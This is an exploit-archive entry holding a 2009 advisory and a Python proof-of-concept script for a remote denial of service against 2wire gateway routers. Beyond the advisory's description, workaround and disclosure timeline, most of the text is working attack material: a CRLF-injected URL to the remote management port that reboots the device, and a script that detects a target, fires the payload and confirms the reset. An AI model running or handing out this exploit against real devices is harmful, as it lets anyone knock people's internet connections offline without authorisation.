2WIRE Router <= 5.29.52 Remote DoS

2009-10-29T00:00:00
ID 1337DAY-ID-9761
Type zdt
Reporter hkm
Modified 2009-10-29T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ==================================
2wire Router <= 5.29.52 Remote DoS
==================================

# Title: 2wire Router <= 5.29.52 Remote DoS
# CVE-ID: ()
# OSVDB-ID: ()
# Author: hkm
# Published: 2009-10-29
# Verified: yes

view source
print?
"""           ========================================
               2WIRE REMOTE DENIAL OF SERVICE
         ========================================
 
 
Device:     2wire Gateway Router/Modem
Vulnerable Software:    < 5.29.52
Vulnerable Models:  1700HG
            1701HG
            1800HW
            2071
            2700HG
            2701HG-T
Release Date:   2009-09-00
Last Update:    2009-09-00
Critical:   Moderately critical
Impact:     Denial of service
        Remote router reboot
Where:      From remote
        In the remote management interface
Solution Status:    Vendor issued firmware patches
            Providers are in charge of applying the patches
WebVuln Advisory:   1-003
 
 
  BACKGROUND
=======================
 
The remote management interface of some 2wire modems is enabled by default.
This interface runs over SSL on port 50001 with an untrusted issuer certificate.
 
++Espa?ol
Algunos m?dems 2wire tienen la interfaz remota habilitada por default.
La interfaz utiliza SSL con un certificado invalido en el puerto 50001.
 
 
   DESCRIPTION
=======================
 
Some 2wire modems are vulnerable to a remote denial of service attack.
By requesting a special url from the Remote Management interface, an unathenticated
user can remotely reboot the complete device.
 
++
Algunos m?dems 2wire son vulnerables a un ataque de denegaci?n de servicio.
Un usuario no autenticado puede reiniciar el dispositivo enviando una petici?n a
la interfaz de Administraci?n remota.
 
 
  EXPLOIT / POC
=======================
 
 https://<remoteIP>:50001/xslt?page=%0d%0a
 
 
  WORKAROUND
=======================
 
Disable Remote Management in Firewall -> Advanced Settings.
 
++
Deshabilitar Administraci?n remota en Cortafuegos -> Configuraci?n avanzada
 
 
   DISCLOSURE TIMELINE
=======================
 
2009/09/06 - Vulnerability discovered
2009/09/08 - Vendor contacted
 
 
                  =======================
 
                           h k m
                        [email protected]
                    http://www.hakim.ws
 
                  =======================
Greets:
preth00nker, DromoroK, mr.ebola, Javier, d0ct0r_4rz0v1zp0, [email protected], fito, HL, Xianur0, [email protected] X, Daemon.
 
 
  REFERENCES
=======================
 
Preth00nker's exploit (LAN) - http://www.milw0rm.com/exploits/2246
2Wire Gateways CRLF DoS (from local network) - http://secunia.com/advisories/21583
Hakim.Ws - http://www.hakim.ws
WebVuln - http://www.webvuln.com"""
 
#  POC
#=======================
 
print "\n     #################################################"
print "    #         2WIRE REMOTE DoS (FW =< 5.29.52)       #"
print "   #                                               #"
print "  #                  [email protected]                 #"
print " #################################################\n"
 
import socket, sys, urllib2
 
socket.setdefaulttimeout(4)
 
try:
    ip = sys.argv[1]
except:
    print " [IP ERROR] -> python 2os.py 123.123.123.123\n"
    sys.exit()
 
if not len(ip.split(".")) == 4:
    print " [IP ERROR] -> python 2os.py 123.123.123.123\n"
    sys.exit()
 
print " [ ] Detectando el dispositivo"
try:
    server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info())
    print " [+] Detectado "+server[int(server.find("Server:"))+8:int(server.find("\n",int(server.find("Server:"))))]
except:
    print " [-] No detectado\n"
    sys.exit()
 
print " [ ] Lanzando el ataque"
try:    str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=%0d%0a")).read())
except: pass
 
try:
    server = str(urllib2.urlopen(urllib2.Request("https://"+str(ip)+":50001/xslt?page=CD35_SETUP_01")).info())
    print " [-] No vulnerable\n"
except:
    print " [+] MODEM RESETADO! EAEA!\n"
    sys.exit()



#  0day.today [2018-04-12]  #